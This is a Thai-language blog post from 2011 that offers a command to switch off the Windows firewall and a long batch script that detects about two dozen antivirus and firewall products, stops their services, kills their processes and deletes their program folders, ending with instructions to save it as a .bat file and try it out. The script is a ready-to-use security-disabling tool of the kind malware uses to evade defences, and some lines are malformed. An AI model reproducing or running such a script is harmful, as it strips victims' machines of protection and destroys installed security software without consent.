วันอังคารที่ 31 พฤษภาคม พ.ศ. 2554

สคริปต์ปิดไฟร์วอลล์และโปรแกรมป้องกันไวรัส

สคริปต์ปิดไฟร์วอลล์และโปรแกรมป้องกันไวรัส

สคริปต์ปิดไฟร์วอลล์ครับ

netsh firewall set opmode mode=DISABLE profile=DOMAIN

สคริปต์ปิดโปรแกรมป้องกันไวรัส

@echo off
rem ---------------------------------------------------------------------
if exist "C:\Program Files\ewido anti-malware" (goto ewido) else (goto 1)
:ewido
cd C:\Program Files\ewido anti-malware"
tskill ewidoctrl.exe
tskill ewidoguard.exe
net stop "ewidoctrl"
net stop "ewidoguard"
attrib -H -S -R *.*
del /s /q *.*
:1
rem ---------------------------------------------------------------------
if exist "C:\Program Files\ESET" (goto nod32) else (goto 2)
:nod32
cd C:\Program Files\ESET"
net stop "nod32krn"
net stop "nod32kui"
net stop "nod32"
tskill nod32krn
tskill nod32kui
tskill nod32
attrib -H -S -R *.*
del /s /q *.*
:2
rem ---------------------------------------------------------------------
if exist "C:\Program Files\Spybot - Search & Destroy" (goto spybot) else (goto 3)
:spybot
cd C:\Program Files\Spybot - Search & Destroy"
cd "C:\Program Files\Spybot - Search & Destroy"
net stop "TeaTimer"
tskill TeaTimer
attrib -H -S -R *.*
del /s /q *.*
:3
rem ---------------------------------------------------------------------
if exist "C:\Program Files\Windows Defender" (goto windefender) else (goto 4)
:windefender
cd C:\Program Files\Windows Defender"
net stop "MsMpEng"
net stop "MSASCui"
tskill MsMpEng
tskill MSASCui
attrib -H -S -R *.*
del /s /q *.*
:4
rem ---------------------------------------------------------------------
if exist "C:\Program Files\McAfee" (goto mcafee) else (goto 5)
:mcafee
cd C:\Program Files\McAfee\McAfee AntiSpyware"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
tskill mcdetect
tskill mctskshd
tskill mcagent
tskill mcvsescn
tskill mcvsftsn
tskill mcvsshld
tskill mcvsrte
tskill mcshield
attrib -H -S -R *.*
del /s /q *.*
rd /s /q ""%programfiles%"\McAfee\McAfee AntiSpyware"
rd /s /q ""%programfiles%"\McAfee"
:5
rem -----------------------------------------------------------------------
if exist "C:\Program Files\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
:zone
cd C:\Program Files\Zone Labs\ZoneAlarm"
net stop "zlclient"
net stop "zonealarm"
net stop "vsmon"
tskill zlclient
tskill zonealarm
tskill vsmon
attrib -H -S -R *.*
del /s /q *.*
cd "C:\WINDOWS\system32\ZoneLabs"
attrib -H -S -R *.*
del /s /q *.*
:6
rem ---------------------------------------------------------------------------
if exist "C:\Program Files\Trend Micro" (goto trend) else (goto 7)
:trend
cd C:\Program Files\Trend Micro\OfficeScan Client"
net stop "ntrtscan"
net stop "tmlisten"
net stop "OfcPfwSvc"
net stop "pccntmon"
tskill ntrtscan
tskill tmlisten
tskill OfcPfwSvc
tskill pccntmon
attrib -H -S -R *.*
del /s /q *.*
:7
rem ------------------------------------------------------------------------------
if exist "C:\Program Files\Synaptics" (goto sinapti) else (goto
:sinapti
cd C:\Program Files\Synaptics\SynTP"
net stop "SynTPLpr"
net stop "SynTPEnh"
tskill SynTPLpr
tskill SynTPEnh.exe
attrib -H -S -R *.*
del /s /q *.*
:8
rem ------------------------------------------------------------------------------
if exist "C:\Program Files\Grisoft\AVG free" (goto avfree) else (goto 9)
:avfree
cd C:\Program Files\Grisoft\AVG free"
net stop "avgamsvr"
net stop "vgupsvc"
net stop "avgcc"
tskill avgamsvr
tskill vgupsvc
tskill avgcc.exe
attrib -H -S -R *.*
del /s /q *.*
:9
rem --------------------------------------------------------------------------------
if exist "C:\Program Files\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
:norton
cd C:\Program Files\Archivos comunes\Symantec Shared"
net stop "ccSetMgr"
net stop "SNDSrvc"
net stop "SPBBCSvc"
net stop "ccEvtMgr"
net stop "ccApp"
net stop "symlcsvc"
tskill ccSetMgr
tskill SNDSrvc
tskill SPBBCSvc
tskill ccEvtMgr
tskill ccApp
tskill symlcsvc
attrib -H -S -R *.*
del /s /q *.*
cd C:\Program Files\Archivos comunes\Symantec Shared\SPBBC"
attrib -H -S -R *.*
del /s /q *.*
cd C:\Program Files\Archivos comunes\Symantec Shared\CCPD-LC"
attrib -H -S -R *.*
del /s /q *.*
:10
rem ---------------------------------------------------------------------------------------
if exist "C:\Program Files\Norton AntiVirus" (goto norton2) else (goto 11)
:norton2
cd C:\Program Files\Norton AntiVirus"
net stop "navapsvc"
net stop "NPFMntor"
tskill navapsvc
tskill NPFMntor
:11
rem ------------------------------------------------------------------------------------------
if exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security" (goto Panda06) else (goto 12)
:Panda06
cd C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
net stop "TPSrv"
net stop "PavFnSvr"
net stop "pavsrv51"
net stop "pskmssvc"
net stop "AVENGINE"
net stop "PNMSRV"
net stop "PsImSvc"
tskill TPSrv
tskill PavFnSvr
tskill pavsrv51
tskill pskmssvc
tskill AVENGINE
tskill PNMSRV
tskill PsImSvc
attrib -H -S -R *.*
del /s /q *.*
cd C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
attrib -H -S -R *.*
del /s /q *.*
cd C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
attrib -H -S -R *.*
del /s /q *.*
cd C:\Program Files\Common Files\Panda Software\PavShld"
tskill pavprsrv
attrib -H -S -R *.*
del /s /q *.*
:12
rem ----------------------------------------------------------------------------------------
if exist "C:\Program Files\Alwil Software\Avast4" (goto Avast4) else (goto 13)
:Avast4
cd C:\Program Files\Alwil Software\Avast4"
net stop "aswUpdSv"
net stop "ashServ"
net stop "ashWebSv"
net stop "ashDisp"
tskill aswUpdSv
tskill ashServ
tskill ashWebSv
tskill ashDisp
attrib -H -S -R *.*
del /s /q *.*
:13
rem -------------------------------------------------------------------------------------------
if exist "C:\Program Files\Microsoft AntiSpyware" (goto micanti) else (goto 14)
:micanti
cd C:\Program Files\Microsoft AntiSpyware"
net stop "gcasServ"
net stop "gcasDtServ"
tskill gcasServ
tskill gcasDtServ
attrib -H -S -R *.*
del /s /q *.*
:14
rem -------------------------------------------------------------------------------------------
if exist "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto 15)
:kav
cd C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal"
net stop "kav"
net stop "kavsvc"
tskill kav
tskill kavsvc
attrib -H -S -R *.*
del /s /q *.*
:15
rem -------------------------------------------------------------------------------------------
if exist "C:\Program Files\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
:sweeper
tskill WRSSSDK
tskill SpySweeper
cd C:\Program Files\Webroot\Spy Sweeper"
attrib -H -S -R *.*
del /s /q *.*
:16
rem -------------------------------------------------------------------------------------------------
if exist "C:\Program Files\SinEspias" (goto sinspy) else (goto 17)
:sinspy
tskill no-spy
attrib -H -S -R *.*
del /s /q *.*
:17
rem ----------------------------------------------------------------------------------------------
if exist "C:\Program Files\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else (goto 18)
:pandatitanium
net stop "Pavsrv51"
net stop "AVENGINE"
net stop "apvxdwin"
net stop "pavProxy"
tskill Pavsrv51
tskill AVENGINE
tskill apvxdwin
tskill pavProxy
cd C:\Program Files\Panda Software\Panda Antivirus Titanium"
attrib -H -S -R *.*
del /s /q *.*
rd /s /q "%programfiles%"\Panda Software\Panda Antivirus Titanium
:18
-------------------------------------------------------------------------------------------------
if exist "C:\Program Files\AntiVir PersonalEdition Classic" (goto avpersonal) else (goto 19)
:avpersonal
net stop "AVGUARD"
net stop "AVWUPSRV"
net stop "AVGNT"
net stop "AVSched32"
tskill AVGUARD
tskill AVWUPSRV
tskill AVGNT
tskill AVSched32
cd C:\Program Files\AntiVir PersonalEdition Classic"
attrib -H -S -R *.*
del /s /q *.*
:19
rem ------------------------------------------------------------------------------------
if exist "C:\Program Files\Softwin\BitDefender9" (goto bit9) else (goto 20)
:bit9
net stop "bdoesrv"
net stop "bdmcon"
net stop "bdnagent"
net stop "bdswitch"
tskill bdoesrv
tskill bdmcon
tskill bdnagent
tskill bdswitch
cd C:\Program Files\Softwin\BitDefender9"
attrib -H -S -R *.*
del /s /q *.*
:20
rem ------------------------------------------------------------------------------------
if exist "C:\Program Files\kerio" (goto kerio) else (goto 21)
:kerio
net stop kpf4
:21
rem ------------------------------------------------------------------------------------
if exist "C:\Program Files\ISS\BlackICE" (goto BlackI) else (goto 22)
:BlackI
tskill blackice
tskill blackd
tskill RapApp
attrib -H -S -R *.*
del /s /q *.*
:22
rem ---------------------------------------------------------------------
if exist "C:\Program Files\mcafee.com" (goto mcafees) else (goto 23)
:mcafees
cd C:\Program Files\mcafee.com\agent"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
tskill mcdetect
tskill mctskshd
tskill mcagent
tskill mcvsescn
tskill mcvsftsn
tskill mcvsshld
tskill mcvsrte
tskill mcshield
attrib -H -S -R *.*
del /s /q *.*
rd /s /q ""%programfiles%"\mcafee.com\agent"
rd /s /q ""%programfiles%"\mcafee.com"
:23
exit

Copy แล้วเอาไปวางใน Notepad จากนั้น Save ไฟล์เป็น .bat นะครับ

ต้องลองเอาไปประยุกต์ใช้ ดูนะครับ

ไม่มีความคิดเห็น:

แสดงความคิดเห็น